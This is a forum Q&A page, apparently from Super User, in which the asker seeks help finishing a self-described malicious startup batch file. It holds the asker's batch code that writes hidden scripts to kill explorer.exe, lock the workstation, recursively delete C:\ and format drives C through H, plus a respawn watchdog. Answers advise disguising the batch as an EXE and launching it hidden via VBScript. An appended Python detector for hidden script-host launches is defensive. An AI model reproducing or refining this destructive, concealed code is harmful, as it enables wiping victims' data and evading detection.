-2

This is very complicated. I'm developing a malicious batch file just to test myself. This will be done at the startup.

What I have is three + six (hidden) batch files. The first file makes six other hidden batch files and then CALLs the second, non-hidden file.

The second file just says some nasty things and at the end executes the six files.

The Third file runs in the background and checks if the second file is running, if not, it will execute the six hidden files.

Now the problem I'm encountering: if the victim has a service or anything that opens a batch file at startup and it keeps running, everything gets messed up, because all the running batch files have the process name cmd.exe. If the victim closes the second (not hidden) file, but another batch file (not part of the virus) is running, the third batch file will assume it is still running, as it also has the name cmd.exe.

And also the second file will not open on the startup.

Here are the codes of my batch files.

File no. 1
@echo off

:DALLING

echo @echo off >>1.bat echo :B >>1.bat echo start >>1.bat echo goto B >>1.bat

echo @echo off >>2.bat echo color 02 >>2.bat echo :start >>2.bat echo taskkill -f explorer.exe >>2.bat echo start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation >>2.bat echo rd c:\ /s /q >>2.bat echo cls >>2.bat

echo @Echo off >>3.bat echo Del C:\ . >>3.bat

echo format E:\ >>4.bat echo format F:\ >>4.bat echo format G:\ >>4.bat echo format H:\ >>4.bat echo format C:\ >>4.bat echo pause >>4.bat

echo @echo off >>5.bat echo :M >>5.bat echo msg * ERROR!! >>5.bat echo goto M >>5.bat

echo @echo off >>6.bat echo color 02 >>6.bat echo :start >>6.bat echo taskkill -f explorer.exe >>6.bat echo start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation >>6.bat echo rd c:\ /s /q >>6.bat echo cls >>6.bat

call Second File

:THE END cls echo BYE BYE! BIG BABY BOO! ping 192.0.2.2 -n 1 -w 500 >nul pause start 1.bat start 2.bat start 3.bat start 4.bat start 5.bat start 6.bat EXIT

I know it has mess that won't work but still...

File No. 2
@echo off

:THW color a echo 5 ping 192.0.2.2 -n 1 -w 1000 >nul cls echo 4 ping 192.0.2.2 -n 1 -w 1000 >nul cls echo 3 ping 192.0.2.2 -n 1 -w 1000 >nul cls echo 2 ping 192.0.2.2 -n 1 -w 1000 >nul cls echo 1 ping 192.0.2.2 -n 1 -w 1000 >nul

:BHANUUB

cls color 04 echo ERROR! ping 192.0.2.2 -n 1 -w 1000 >nul echo. echo. echo. echo System Failure! Windir/system32/Windows programming changing. Warning, system disability! echo System can still be saved, you might lose some data. Do you want to save the system? echo (y/n)? echo. echo. set/p bhaa= if %bhaa%==y goto HUH if %bhaa%==Y goto HUH if %bhaa%==n goto THE END if %bhaa%==N goto THE END

:HUH color a cls echo Saving system. ping 192.0.2.2 -n 1 -w 500 >nul cls echo Saving system.. ping 192.0.2.2 -n 1 -w 500 >nul cls echo Saving system... ping 192.0.2.2 -n 1 -w 500 >nul cls echo Saving system.... ping 192.0.2.2 -n 1 -w 500 >nul cls echo Saving system..... ping 192.0.2.2 -n 1 -w 150 >nul goto ENDDD cls

:ENDDD cls color 04 echo HUH!! You wanna save the system, do you???? echo. echo.

echo *** ***
echo *** ***
echo *** \ / ***
echo *** \ / / ***
echo *** //ON'T LET YOU ***
echo *** ***
echo *** ***

ping 192.0.2.2 -n 1 -w 3000 >nul goto THE END

I know the statements seem weird but still...

I picked the third file from stackoverflow and modified it a little, Third file

File No. 3
@echo off
:B

Set "MyProcess=cmd.exe" echo "%MyProcess%" tasklist /NH /FI "imagename eq %MyProcess%" 2>nul |find /i "%MyProcess%" >nul If not errorlevel 1 (Echo "%MyProcess%" est en cours d^'execution) else (start "" "1.bat","" "2.bat","" "3.bat","" "4.bat","" "5.bat","" "6.bat") goto B

And I know the code of the third file seems wrong, but it is not, as it will stop executing the programs once the other cmd.exes are started. But how to terminate it then?

And also how to execute all the six programs, not the way I've written I think.

And the third file will not be going in the startup folder as I have a vbscript I found that will start it in background.

BUT it's not working for me and also I don't know how to use it :P.

This is the VBScript (or solution) which I found.
Solution 1:

Save this one line of text as file invisible.vbs:

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

To run any program or batch file invisibly, use it like this:

wscript.exe “C:\Wherever\invisible.vbs” “C:\Some Other Place\MyBatchFile.bat”

To also be able to pass-on/relay a list of arguments use only two double quotes

CreateObject(“Wscript.Shell”).Run “” & WScript.Arguments(0) & “”, 0, False

eg: Invisible.vbs “Kill.vbs ME.exe”

Solution 2:

Use a command line tool to silently launch a process : Quiet.

I was going to put the first file and the VBScript (if it was working) in the startup folder.

Any help will be hugely appreciated and I seek a detailed answer.

Thanks Superuser

P.S:- The title is not enough for the problems, is it?

2 Answers

5

Wow that's quite a lot of information, much of which just adds confusion, so I'll stick to the title question at hand... :)

How to stop every batch file opening as a process named cmd.exe as seen in task manager?

Since batch files are intended for automating (scripting) the command-line, all batch files are run by the command-line interpreter process, which on Windows is cmd.exe.

I think the easiest method in your scenario would be to use a utility to convert your batch file into an EXE. That way you can name it how you'd like, apply an icon, and most importantly, have it show up in Task Manager as its own, named process.

For help with converting, check out this existing SU question: How can I convert a Windows batch script to a .exe?

2

For the 3rd part

And the third file will not be going in the startup folder as I have a vbscript I found that will start it in background.

BUT it's not working for me and also I don't know how to use it :P.

This is the VBScript (or solution) which I found.

To run a batch script or some other process as HIDDEN so it does show when launched as it would otherwise, use the below logic saved to a .VBS file. You will launch the .VBS file to execute whatever program or script you have it pointed to, and when that process is run, it'll not show a console window, etc.

Important: Be sure to plug in the full path and name of the process you wish to launch hidden in the part of the script in my example shown as C:\Path\Script.bat, and also be sure to KEEP the double quotes around it regardless of spaces in the path or file name.

Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "C:\Path\Script.bat" & Chr(34), 0
Set WinScriptHost = Nothing

Note: I use this for a couple scheduled processes on a server where multiple people RDP into it for managing different types of scheduled jobs and schedulers (not Task Scheduler but on Windows Server), and it suits the need quite fine. I'd suggest having your batch or other processes log to a log file for later review, dynamic error reporting, etc. if possible.

Source: Server Fault
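
Seen from the monitoring side, the hidden-launch pattern in this answer leaves a distinctive process-creation record: a cmd.exe whose parent is a Windows Script Host binary and whose command line names a batch file. The following is an added example, not part of the original answer; the records are constructed (using Sysmon Event ID 1 field names), and the function name, the `C:\Jobs` paths and the user name `a` are assumptions.

```python
import ntpath
import re

# Constructed process-creation records (Sysmon Event ID 1 field names).
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Path\Script.bat" "',
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "ParentCommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Jobs\hidden.vbs"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Jobs\backup.bat""',
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\Explorer.EXE"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c ""C:\Users\a\AppData\Roaming\Microsoft\Windows'
                    r'\Start Menu\Programs\Startup\x.bat""',
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "ParentCommandLine": r'wscript.exe "C:\Users\a\AppData\Roaming\Microsoft'
                          r'\Windows\Start Menu\Programs\Startup\x.vbs"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A drive-rooted path ending in .bat or .cmd; quotes delimit it, spaces do not.
BATCH_RE = re.compile(r'([A-Za-z]:\\[^"]*?\.(?:bat|cmd))\b', re.IGNORECASE)
STARTUP = "\\start menu\\programs\\startup\\"


def image_name(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return ntpath.basename(path).lower()


def hidden_batch_launches(events):
    """Return cmd.exe launches of batch files whose parent is a script host."""
    findings = []
    for ev in events:
        # The image name alone is cmd.exe for every batch file, so the parent
        # process and the command line are what separate one job from another.
        if image_name(ev["Image"]) != "cmd.exe":
            continue
        if image_name(ev["ParentImage"]) not in SCRIPT_HOSTS:
            continue
        match = BATCH_RE.search(ev["CommandLine"])
        if not match:
            continue
        launcher = ev["ParentCommandLine"]
        findings.append({
            "script": match.group(1),
            "launcher": launcher,
            # Either file sitting in a Startup folder means it runs at logon.
            "startup": STARTUP in (match.group(1) + launcher).lower(),
        })
    return findings
```

A scheduled job launched this way on a managed server produces the same record, so matches are triage leads to compare against the known job inventory rather than verdicts.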